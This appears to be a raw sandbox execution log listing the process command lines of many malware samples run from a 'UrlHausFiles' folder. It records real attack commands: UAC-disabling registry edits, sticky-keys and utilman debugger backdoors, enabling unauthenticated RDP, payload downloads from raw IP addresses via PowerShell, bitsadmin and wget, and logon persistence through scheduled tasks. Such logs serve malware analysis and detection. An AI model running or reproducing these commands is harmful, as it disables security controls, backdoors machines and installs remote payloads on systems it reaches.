mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10C4.tmp\10C5.tmp\10C6.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1960 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe

"C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4349545209397118218,18204725807592143253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 940

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 960

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1184

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1236

C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1228

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E9A.tmp\3E9B.tmp\3E9C.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40CD.tmp\40CE.tmp\40CF.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 812

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"

C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping 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-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1968 -ip 1968

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{2F09D49A-D224-44E5-9560-BB94460123D0}"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1556

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Users\Admin\Downloads\UrlHausFiles\boot.exe

"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E26.tmp\6E27.tmp\6E28.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1968 -ip 1968

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1644

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1868

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

